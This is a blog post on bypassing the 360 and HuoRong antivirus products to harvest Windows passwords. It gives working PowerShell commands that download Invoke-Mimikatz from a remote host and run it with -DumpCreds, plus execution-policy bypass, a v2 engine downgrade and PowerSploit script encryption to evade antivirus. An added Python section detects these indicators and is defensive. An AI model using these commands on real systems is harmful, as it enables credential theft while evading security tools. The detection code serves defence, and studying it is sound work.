PowerShell bypass to catch passwords


A few words

A short practical note on problems I ran into in practice: the approach below can bypass 360 and HuoRong.

Introduction

Under PowerShell's default policy, .ps1 scripts are not allowed to execute.

```powershell
Get-ExecutionPolicy
```

This shows that the current policy is Restricted.

You can change the execution policy with administrator rights. Do not ask me why I have administrator rights: you cannot catch passwords as a normal user anyway.

```powershell
Set-ExecutionPolicy Unrestricted
```

Actual use

PSV2

As we all know, the easy way looks like this:

```powershell
powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
```

Now, if you run the v2 engine instead, you may be able to bypass some AV, like this:

```powershell
powershell -Version 2 -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
```

Encode script

We all know the PowerSploit project; how about using it for the bypass?

Here we use Out-EncryptedScript: put it in the same directory as the Mimikatz script, then encrypt the script with it:

```powershell
Import-Module .\Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password woshijiamide -Salt safety
```

Upload our encrypted .ps1 script to the target, then run the following:

```powershell
powershell.exe
IEX(New-Object Net.WebClient).DownloadString("http://192.168.159.1:8888/Out-EncryptedScript.ps1")
[String] $cmd = Get-Content .\new1.ps1
Invoke-Expression $cmd
$decrypted = de woshijiamide safety
Invoke-Expression $decrypted
Invoke-Mimikatz
```

In the same way, both files can of course also be hosted remotely; that does not affect the final result.

You may get some errors, but you can still catch the password.
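From the defender's side, here is an added example that is not from the original post: a Python check over captured powershell.exe command lines (Sysmon event 1 or 4688 style; the sample is constructed inline from the post's own command) that flags the indicators this post relies on: the -Version 2 engine downgrade, the execution-policy bypass, the download cradle and the tooling names. The switch table models powershell.exe's prefix and alias handling as I understand it, and the finding labels are my own.

```python
import re
import shlex
# Constructed sample modelled on the post's own command line (not a real capture).
SAMPLE = ('powershell -Version 2 -exec bypass -C "IEX (New-Object Net.WebClient)'
          ".DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');"
          'Invoke-Mimikatz -DumpCreds"')
# powershell.exe accepts any prefix of a switch name down to a per-switch minimum ("-v",
# "-ex", "-exec" ...) plus the aliases "-ep"/"-ec"; modelled on the console host's parser
# as I understand it (an assumption, not the post's code).
SWITCHES = [("version", "v"), ("executionpolicy", "ex"), ("encodedcommand", "e"),
            ("command", "c"), ("file", "f"), ("windowstyle", "w"), ("noprofile", "nop"),
            ("noninteractive", "noni"), ("nologo", "nol"), ("noexit", "noe")]
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
# Download-and-run cradles, and the tooling the post names, matched in the body.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|"
                    r"Invoke-WebRequest|\bIWR\b|FromBase64String", re.I)
TOOLING = re.compile(r"Out-EncryptedScript|Invoke-Mimikatz|DumpCreds", re.I)

def expand_switch(token):
    """Resolve '-exec', '/v', '-ep' ... to a full switch name; None if unknown or ambiguous."""
    if token[:1] not in ("-", "/"):
        return None
    key = token[1:].lower()
    if key in ALIASES:
        return ALIASES[key]
    for full, shortest in SWITCHES:
        if full.startswith(key) and key.startswith(shortest):
            return full
    return None

def analyze(cmdline):
    """Return the set of finding labels for one captured powershell command line."""
    findings = set()
    # non-POSIX mode keeps a quoted -Command body as one token, quotes included
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens):
        name = expand_switch(tok)
        value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
        if name == "version" and value.startswith("2"):
            findings.add("engine-downgrade-v2")  # v2 engine: no AMSI, no script block log
        elif name == "executionpolicy" and value in ("bypass", "unrestricted"):
            findings.add("execution-policy-bypass")
        elif name == "encodedcommand":
            findings.add("encoded-command")
    if CRADLE.search(cmdline):
        findings.add("download-cradle")
    if TOOLING.search(cmdline):
        findings.add("credential-dump-tooling")
    return findings
```

Pair the command-line check with the Windows PowerShell log: an engine-start event (ID 400) reporting EngineVersion 2.0 on a host that normally runs 5.1 is the downgrade seen from the other side.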


Author: Yangsir
Reprint policy: Unless stated otherwise, all articles in this blog are licensed under CC BY 4.0. If you reproduce them, please credit the source, Yangsir!